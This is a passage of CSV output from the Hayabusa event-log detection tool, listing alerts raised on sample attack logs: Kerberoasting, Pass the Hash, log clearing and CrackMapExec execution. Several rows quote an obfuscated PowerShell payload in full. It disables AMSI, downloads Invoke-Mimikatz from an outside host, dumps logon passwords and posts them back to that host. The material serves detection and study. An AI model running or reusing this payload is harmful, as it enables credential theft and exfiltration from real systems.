0xc712f1,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: 192.168.1.100 | LID: 0xc7142b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc714d9,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL | Svc: DC-SERVER-1$ | IP Addr: ::1 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7313f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7adb8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: DC-SERVER-1$ | Computer: | IP Addr: fe80::e50e:b89e:4718:3aa | LID: 0xc7ae25,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx 2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Evas,Security Log Cleared,User: Administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,info,,NTLM Logon To Local Account,User: Alice | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,info,,Logon Type 3 - Network,User: Alice | Computer: | IP Addr: 192.168.1.200 | LID: 0x27d676,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,CredAccess,Possible Kerberoasting,Possible Kerberoasting Risk Activity.,../hayabusa-rules/hayabusa/default/alerts/Security/4768_KerberosTGT-Request_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,info,,Kerberos TGT Requested,User: Alice | Svc: krbtgt | IP Addr: ::ffff:192.168.1.200 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,info,,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL | Svc: sql101 | IP Addr: ::ffff:192.168.1.200 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,info,,Logoff,User: Alice | LID: 0x27d676,../hayabusa-rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x36df3b7 | PID: 7728 | PGUID: 9828DA72-683B-608C-A30C-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.761 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" -JOIN('91A78H101@116f46G83@101S114H118@105k99T101@80S111k105T110k116T77,97@110T97S103A101H114A93S58k58,83@101A114@118k101@114G67,101T114S116S105@102,105,99G97@116A101S86A97A108H105@100G97H116@105A111,110@67T97T108k108S98@97f99T107@32@61S32k123T36@116G114H117G101f125S10,116f114,121A123A10A91k82S101S102T93f46,65@115H115H101S109H98H108,121,46f71@101@116T84f121G112@101T40@39,83k121f115S39,43G39A116@101,109k46,77T97A110@39A43f39f97S103H101k109T101G110G116S46k65@117A116A39k43@39S111f109k97@116@105f111T110f46@65S109A39T43,39@115,105f85G116@39G43G39T105@108@115@39T41,46A71S101H116S70@105@101A108T100S40f39k97A109@39H43G39T115T105,73T110S105S39@43@39f116f70H97@105@108A101@100T39@44@32H39@78S111f110G80@39A43@39H117H98k108G105H99S44@83@116T97T39G43S39S116A105@99,39H41H46T83S101S116k86T97A108,117H101@40f36,110A117k108A108@44k32@36@116f114T117@101G41G10,125,99f97H116A99@104H123f125,10H91T78T101f116k46A83f101S114f118S105,99,101A80k111f105G110f116f77S97A110k97@103T101,114@93S58k58T83H101H114G118,101@114@67G101@114A116@105G102H105k99G97S116T101@86S97f108k105k100H97G116S105,111k110k67k97T108@108,98S97@99@107A32H61,32,123@36H116f114k117,101k125@10,91@83f121k115S116@101@109S46H78G101A116S46@83S101A114T118T105@99H101@80H111G105f110,116f77H97f110S97@103,101f114H93A58f58A83@101k99@117G114,105@116@121@80S114A111,116A111f99k111k108@32@61@32H91k83T121,115@116f101H109T46@78@101@116T46G83k101,99f117@114k105k116@121f80H114T111A116f111G99G111@108A84S121H112G101@93G39A83A115k108H51@44,84T108G115k44k84T108A115T49A49@44@84G108@115@49S50@39@10S73k69T88G32f40@78A101@119@45f79,98H106@101S99k116k32G78,101A116@46@87@101k98G67S108G105,101@110G116G41G46@68S111@119f110H108H111,97@100@83H116@114H105@110@103k40H39A104A116H116A112S115A58G47f47S49H48T46A50H51,46k49H50H51k46H49k49H58H52A52f51f47@73@110S118f111@107k101G45S77@105T109@105,107,97,116H122H46k112A115k49T39@41T10T36S99@109T100S32,61S32f73H110H118H111T107,101@45H77@105f109,105@107k97@116@122T32,45k67H111H109H109@97S110k100S32S39T112k114,105f118k105,108G101T103A101,58H58A100A101S98S117,103S32@115@101H107@117@114A108k115,97f58,58f108S111H103S111A110,112H97f115H115G119@111G114@100f115@32S101f120f105k116G39,10G36G114H101f113k117,101S115G116@32@61,32A91A83T121T115k116k101G109G46H78H101S116@46H87k101T98G82S101S113@117A101@115k116H93@58S58@67T114,101T97H116S101@40k39T104f116k116k112k115S58,47f47@49G48@46,50k51G46@49G50,51H46@49@49A58H52H52,51@47@39k41A10H36S114H101A113,117@101@115k116@46,77,101H116@104G111k100S32@61A32S39S80G79k83k84k39T10H36@114k101,113T117H101H115@116,46,67H111T110@116S101@110G116T84@121S112,101k32G61H32T39H97,112G112,108T105f99k97f116k105f111@110T47@120G45,119H119S119S45T102S111,114H109A45f117G114f108f101H110H99H111k100f101k100T39@10,36A98@121G116f101@115f32T61T32G91H83A121S115G116,101,109T46k84G101f120T116S46T69A110G99T111k100,105S110k103@93@58T58S65T83S67S73G73G46A71A101G116f66k121f116@101H115T40,36,99T109@100S41k10@36A114H101f113@117H101H115H116G46G67A111,110@116,101f110,116T76A101H110f103f116@104@32,61S32S36@98T121H116G101,115f46A76@101f110A103f116H104A10@36G114G101G113A117f101H115k116k83,116f114G101T97k109A32S61T32f36H114@101,113f117@101f115S116H46f71f101G116,82S101T113f117,101,115S116,83,116T114H101k97f109T40S41,10T36S114H101G113H117S101f115H116H83@116A114G101G97H109G46f87k114k105H116G101T40A36f98f121@116H101k115T44@32S48S44k32,36,98k121G116@101@115T46G76@101H110,103G116A104,41H10k36T114G101G113A117@101@115@116T83k116A114k101T97H109A46H67S108S111A115A101k40T41T10H36k114S101@113f117T101@115S116S46f71@101f116,82f101f115@112T111k110@115S101k40@41'.sPlIT('@A@GkTfSH,' )|%{([iNt] $_ -AS [char])})| .( $ENv:comsPec[4,26,25]-JOIn'')"" | LID: 0x36df3b7 | PID: 4436 | PGUID: 9828DA72-683B-608C-A50C-000000000C00 | Hash: SHA1=F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054,MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas | Exec,Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec | Evas,CrackMapExec PowerShell Obfuscation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_crackmapexec_powershell_obfuscation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Change PowerShell Policies to an Unsecure Level,,../hayabusa-rules/sigma/process_creation/proc_creation_win_set_policies_to_unsecure_level.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,high,Exec,Suspicious PowerShell Parameter Substring,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_suspicious_parameter_variation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:27:39.911 +09:00,win10-02.offsec.lan,1,medium,Exec,Too Long PowerShell Commandlines,,../hayabusa-rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID1-CrackMapExec payload execution.evtx 2021-05-01 05:32:55.804 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,". ( $PsHoME[4]+$PsHoME[34]+'X')( $(Sv 'Ofs' '' ) +[StriNG]('91A78}101d116,46t83d101A114d118A105A99A101W80N111N105N110N116d77}97A110z97}103z101A114N93,58A58N83d101}114}118t101t114}67A101t114A116N105W102}105,99A97t116}101,86}97}108W105W100z97}116,105}111}110W67,97N108A108}98}97}99A107,32A61t32N123t36}116,114A117}101A125N10A116A114A121}123}10}91}82W101W102A93A46d65}115,115}101d109t98,108t121t46}71z101N116N84t121z112d101d40t39z83N121d115z39}43z39t116N101A109d46}77d97d110N39A43z39W97d103W101W109t101}110N116W46d65A117z116z39W43d39}111d109A97z116}105A111z110z46W65A109}39z43A39}115t105}85t116}39N43z39d105A108A115t39z41N46W71W101}116z70d105N101A108t100,40}39,97}109d39A43W39z115}105}73d110}105}39d43t39A116t70t97N105N108}101d100A39z44z32N39W78A111A110z80W39z43d39,117t98N108}105t99}44N83,116W97}39}43A39}116W105,99W39}41z46A83N101,116z86d97}108t117N101z40A36N110d117A108A108z44N32}36}116}114,117A101N41W10,125,99}97A116A99,104d123t125A10}91t78t101}116,46,83d101W114z118}105N99A101d80A111,105t110}116W77,97N110d97,103A101}114W93}58t58}83A101d114z118t101A114A67N101W114d116,105N102d105N99}97,116W101z86t97}108}105A100A97,116z105A111z110}67W97d108d108}98}97z99,107N32N61,32,123}36d116t114}117}101N125}10N91A83}121,115A116}101z109A46}78}101W116N46A83}101,114,118,105}99N101,80,111A105z110A116A77A97,110N97t103t101t114}93}58d58t83N101t99,117d114z105A116d121,80}114,111}116,111}99A111W108W32}61A32W91W83z121W115}116t101}109d46}78A101t116N46t83N101A99}117d114W105d116A121}80d114W111t116z111}99d111z108}84z121N112z101,93A39,83A115z108,51d44W84}108z115A44N84A108t115A49W49N44,84}108}115N49d50,39W10t73t69t88W32}40A78A101A119A45A79d98d106t101z99}116A32W78}101W116t46}87,101N98A67,108A105d101}110d116,41A46z68d111N119N110z108A111}97A100z83t116A114A105A110,103,40A39d104d116N116N112A115t58A47N47z49}48z46,50}51A46}49d50t51N46}49A49A58N52}52}51W47}73W110A118}111A107}101N45t77}105A109}105,107W97t116z122z46,112t115}49A39,41d10t36d99t109z100t32W61d32t73}110,118,111}107d101W45W77z105}109}105,107d97z116d122W32d45t67z111A109W109}97d110t100t32A39,112A114}105N118W105}108N101}103z101N58,58t100d101t98z117t103W32W115W101}107t117d114z108A115}97,58N58W108A111A103A111}110A112A97A115N115z119d111}114d100A115N32N101,120}105}116z39}10,36A114}101z113d117N101}115t116N32d61t32A91}83d121A115W116W101d109t46N78t101A116A46}87z101W98z82t101W113d117A101t115d116d93d58N58W67,114}101d97A116}101z40}39N104N116}116t112,115W58t47d47N49A48d46}50A51A46}49,50N51N46}49A49,58t52d52}51}47}39}41A10z36N114}101z113z117N101A115W116A46d77t101W116W104A111t100,32,61z32,39d80,79,83W84d39z10}36t114A101t113d117W101t115N116z46d67}111A110t116z101z110}116t84d121}112A101}32A61t32A39z97d112W112W108}105,99N97d116t105}111z110z47}120}45A119t119z119}45N102,111N114}109A45d117A114t108z101N110A99A111}100}101A100z39A10t36z98}121,116A101z115A32A61}32}91N83}121A115W116N101d109A46}84}101W120N116}46N69,110}99W111W100}105t110,103A93,58A58z65z83W67d73t73W46A71N101}116t66}121,116A101}115A40,36N99A109A100A41z10A36A114z101A113}117,101N115A116W46,67d111d110z116z101t110A116}76}101z110t103}116A104,32}61t32N36d98,121N116z101}115N46}76z101N110,103z116W104}10A36d114d101A113N117}101A115d116}83z116A114A101,97N109z32,61}32}36}114W101t113N117,101W115A116}46A71}101W116A82z101A113A117N101t115N116t83A116A114}101d97d109}40}41t10z36A114t101d113A117}101A115A116A83N116}114d101}97W109A46,87z114d105,116A101,40}36W98N121z116z101t115}44A32z48}44d32}36A98W121t116A101}115W46,76N101t110W103}116,104t41d10A36z114N101}113A117}101}115d116}83A116N114t101W97W109W46,67}108}111}115d101t40t41A10z36W114}101t113t117N101A115N116t46d71t101W116}82W101z115}112}111A110d115}101}40,41'.SPlIT('Nz}tAdA,}W') | ForEach-ObJEct { ([int] $_ -AS [ChAR]) } ) +$( set-itEM 'VaRiAble:Ofs' ' ' ) )",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:55.923 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Variable): ""Set-Variable"" ParameterBinding(Set-Variable): name=""Name""; value=""Ofs"" ParameterBinding(Set-Variable): name=""Value""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4103-4104-CrackMapExec payload execution.evtx 2021-05-01 05:32:55.942 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,{ ([int] $_ -AS [ChAR]) },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 